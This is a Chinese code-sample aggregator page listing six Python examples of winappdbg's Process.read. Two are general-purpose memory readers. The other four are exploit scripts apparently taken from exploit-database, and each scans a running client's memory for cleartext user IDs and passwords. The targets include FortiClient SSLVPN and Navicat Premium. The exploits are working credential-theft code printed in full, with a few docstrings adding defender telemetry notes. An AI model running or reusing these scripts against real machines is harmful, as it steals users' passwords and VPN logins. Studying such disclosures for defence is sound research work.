

Python Process.read方法代码示例

本文整理汇总了Python中winappdbg.Process.read方法的典型用法代码示例。如果您正苦于以下问题:Python Process.read方法的具体用法?Python Process.read怎么用?Python Process.read使用的例子?那么恭喜您, 这里精选的方法代码示例或许可以为您提供帮助。您也可以进一步了解该方法所在winappdbg.Process的用法示例。


在下文中一共展示了Process.read方法的6个代码示例,这些例子默认根据受欢迎程度排序。您可以为喜欢或者感觉有用的代码点赞,您的评价将有助于系统推荐出更棒的Python代码示例。

示例1: memory_search

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def memory_search( pid ):
        """Scan the memory of process ``pid`` for digit strings and print them.

        Two regular-expression searches are run over the target's memory:
        one for three groups of three digits separated by spaces (printed as
        "Possible UserIDs"), and one for four digits followed by a fixed byte
        sequence (printed as "Password"). In both patterns every character is
        followed by a NUL byte, which is how UTF-16LE text is laid out.

        Returns the list of 16-byte blocks read around each password match.

        Defender notes: any value this prints was held as cleartext in the
        target's address space, readable by any code allowed to open the
        process for reading. Cross-process reads of this kind show up as
        process-access telemetry (for example Sysmon Event ID 10) against the
        target process. The durable fix is in the target application: do not
        keep credentials in cleartext in memory longer than needed.
        """
        found = []
        # Instance a Process object.
        process = Process( pid )
        # Search for the string in the process memory.

        # Looking for User ID:
        # Pattern: "ddd ddd ddd" with a NUL after each character, followed by
        # one byte that is not ')'.
        userid_pattern = '([0-9]\x00){3} \x00([0-9]\x00){3} \x00([0-9]\x00){3}[^)]'
        for address in process.search_regexp( userid_pattern ):
                 found += [address]

        print 'Possible UserIDs found:'
        # Each search result is indexed below: the last element is treated as
        # the matched bytes, element 0 (further down) as the match address.
        found = [i[-1] for i in found]
        # set() collapses repeated hits; the NUL bytes are stripped for display.
        for i in set(found):
           print i.replace('\x00','')

        found = []
        # Looking for Password:
        # Pattern: four digits (each followed by NUL) and then a fixed run of
        # bytes that the author expects to follow the value in memory.
        pass_pattern = '([0-9]\x00){4}\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x07\x00\x00'
        for address in process.search_regexp( pass_pattern ):
                 # Read 16 bytes starting 3 bytes before the match address.
                 found += [process.read(address[0]-3,16)]
        if found:
            print '\nPassword:'
        if len(found) > 1:
            # Keep only blocks that were seen more than once.
            s = list(set([x for x in found if found.count(x) > 1]))
            for i in s:
               pwd = re.findall('[0-9]{4}',i.replace('\x00',''))[0]
            # NOTE(review): this print sits outside the loop, so only the last
            # value is shown, and pwd is unbound when s is empty.
            print pwd
        else:
            # NOTE(review): this branch is also taken when found is empty, in
            # which case found[0] raises IndexError.
            print re.findall('[0-9]{4}',found[0].replace('\x00',''))[0]

        return found
开发者ID:AlexxNica,项目名称:exploit-database,代码行数:34,代码来源:40342.py

示例2: main

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
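def main():
    """Command-line entry point: read a range of memory from another process.

    Arguments are taken from ``sys.argv``::

        <script> <pid | process.exe> <address> <size> [binary output file]

    The first argument is parsed as a number (a PID); if that fails it is
    treated as an executable filename and resolved to a single running
    process. With an output file the raw bytes are written to it, otherwise
    a hex dump is printed. Returns None in every case; errors are reported
    on stdout.
    """
    print "Process memory reader"
    print "by Mario Vilas (mvilas at gmail.com)"
    print

    if len(sys.argv) not in (4, 5):
        script = os.path.basename(sys.argv[0])
        print "  %s <pid> <address> <size> [binary output file]" % script
        print "  %s <process.exe> <address> <size> [binary output file]" % script
        return

    # Ask for debug privileges before opening the target. The return value is
    # not checked, so an account without the privilege carries on regardless.
    System.request_debug_privileges()

    try:
        pid = HexInput.integer(sys.argv[1])
    except Exception:
        # Not a number: resolve the argument as a process filename instead.
        # (Was a bare "except:", which also swallowed KeyboardInterrupt and
        # SystemExit; the other two handlers below already use Exception.)
        s = System()
        s.scan_processes()
        pl = s.find_processes_by_filename(sys.argv[1])
        if not pl:
            print "Process not found: %s" % sys.argv[1]
            return
        if len(pl) > 1:
            print "Multiple processes found for %s" % sys.argv[1]
            for p,n in pl:
                # The first tuple element is a process object (see get_pid()
                # below), so format its PID rather than the object itself.
                print "\t%s: %s" % (HexDump.integer(p.get_pid()),n)
            return
        pid = pl[0][0].get_pid()

    try:
        address = HexInput.integer(sys.argv[2])
    except Exception:
        print "Invalid value for address: %s" % sys.argv[2]
        return

    try:
        size = HexInput.integer(sys.argv[3])
    except Exception:
        print "Invalid value for size: %s" % sys.argv[3]
        return

    p = Process(pid)
    data = p.read(address, size)
    print "Read %d bytes from PID %d" % (len(data), pid)

    if len(sys.argv) == 5:
        filename = sys.argv[4]
        # The path comes straight from the command line and is overwritten if
        # it exists. The dump can hold secrets from the target process, so
        # store it accordingly. "with" closes the file even if write() fails.
        with open(filename, 'wb') as output:
            output.write(data)
        print "Written %d bytes to %s" % (len(data), filename)
    else:
        # 16 bytes per row when pointers are DWORD-sized, 8 otherwise.
        if win32.sizeof(win32.LPVOID) == win32.sizeof(win32.DWORD):
            width = 16
        else:
            width = 8
        print
        print HexDump.hexblock(data, address, width = width)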
开发者ID:MarioVilas,项目名称:winappdbg,代码行数:59,代码来源:pread.py

示例3: process_read

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def process_read( pid, address, length ):
    """Return ``length`` bytes read from ``address`` in process ``pid``.

    The memory contents come back as a Python string, exactly as
    ``Process.read`` returns them.
    """
    # The same Process object can also modify the target's memory, e.g.
    # process.write( address, "example data" ); this helper only reads.
    target = Process( pid )
    return target.read( address, length )
开发者ID:vkremez,项目名称:WinAPI-Debugger,代码行数:11,代码来源:ReadingProcessMemory.py

示例4: memory_search

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
def memory_search( pid, strings ):
                """Search process ``pid`` for ``strings`` and print fields near each hit.

                For every address where the byte string is found, 800 bytes are
                read starting 10 bytes before the match. Any dump containing the
                marker "FortiClient SSLVPN offline" is sliced at fixed offsets and
                printed as server address/port, user name and password. Nothing is
                returned.

                Defender notes: whatever this prints was kept as cleartext in the
                client's memory, readable by any code allowed to open the process
                for reading. Cross-process reads like this appear as process-access
                telemetry (for example Sysmon Event ID 10) against the client
                process. The fix belongs in the client: do not keep credentials in
                cleartext after they have been used.
                """
                process = Process( pid )
                mem_dump = []
                ######
                # You could also use process.search_regexp to use regular expressions,
                # or process.search_text for Unicode strings,
                # or process.search_hexa for raw bytes represented in hex.
                ######
                for address in process.search_bytes( strings ):
                                dump = process.read(address-10,800)                             # read 800 bytes, starting 10 bytes before the match
                                mem_dump.append(dump)
                                # NOTE(review): this loop is nested in the search loop, so
                                # dumps collected earlier are examined again on every hit.
                                for i in mem_dump:
                                                if "FortiClient SSLVPN offline" in i:                       # marker string; fields are taken at fixed offsets into the dump
                                                                # Hard-coded slices; presumably tied to the build
                                                                # the author tested. TODO confirm.
                                                                print "\n"
                                                                print " [+] Address and port to connect: " + str(i[136:180])
                                                                print " [+] UserName: " + str(i[677:685])
                                                                print " [+] Password: " + str(i[705:715])
                                                                print "\n"
开发者ID:AlexxNica,项目名称:exploit-database,代码行数:20,代码来源:40330.py

示例5: Debug

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
debug = Debug()
try:
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x00\x90\x18\x00\x00\x00\x00\x00\x00\x00'):
			memory_dump.append(process.read(address,30))
		memory_dump.pop(0)
		for i in range(len(memory_dump)):
			str = b2h(memory_dump[i])
			first = str.split("00 90 18 00 00 00 00 00 00 00 ")[1]
			last = first.split("00 ")
			if last[0]:
				count = count+1
				found = 1
				print "[+] Password for connection #%d found as %s" % (count, h2b(last[0]))
		if found == 0:
			print "[-] Password not found! Make sure the client is connected at least to one database."
	else:
		print "[-] No process found with name '%s'." % (filename)
	
	debug.loop()
开发者ID:yakir-wizman,项目名称:Vulnerabilities,代码行数:32,代码来源:Navicat+Premium+11.2.11+(64bit)+Local+Password+Disclosure.py

示例6: Process

# 需要导入模块: from winappdbg import Process [as 别名]
# 或者: from winappdbg.Process import read [as 别名]
	print "#\t\tTested on Windows Windows 7 64bit, English\t\t#"
	print "#\t\t\tPlease use responsibly.\t\t\t\t#"
	print "#########################################################################\r\n"
	print "[~] Searching for pid by process name '%s'.." % (filename)
	time.sleep(1)
	debug.system.scan_processes()
	for (process, process_name) in debug.system.find_processes_by_filename(filename):
		process_pid = process.get_pid()
	if process_pid is not 0:
		print "[+] Found process with pid #%d" % (process_pid)
		time.sleep(1)
		print "[~] Trying to read memory for pid #%d" % (process_pid)
		
		process = Process(process_pid)
		for address in process.search_bytes('\x88\x38\xB7\xAE\x73\x8C\x07\x00\x0A\x16'):
			memory_dump.append(process.read(address,50))
		
		try:
			str = b2h(memory_dump[0]).split('88 38 B7 AE 73 8C 07 00 0A 16')[1]
			usr = h2b(str.split(' 00')[0])
		except:
			pass
			
		memory_dump	= []
		for address in process.search_bytes('\x65\x00\x88\x38\xB7\xAE\x73\x8C\x07\x00\x02\x09'):
			memory_dump.append(process.read(address,60))
		try:
			str = b2h(memory_dump[0]).split('07 00 02 09')[1]
			pwd = h2b(str.split(' 00')[0])
		except:
			pass
开发者ID:AlexxNica,项目名称:exploit-database,代码行数:33,代码来源:40350.py


注:本文中的winappdbg.Process.read方法示例由纯净天空整理自Github/MSDocs等开源代码及文档管理平台,相关代码片段筛选自各路编程大神贡献的开源项目,源码版权归原作者所有,传播和使用请参考对应项目的License;未经允许,请勿转载。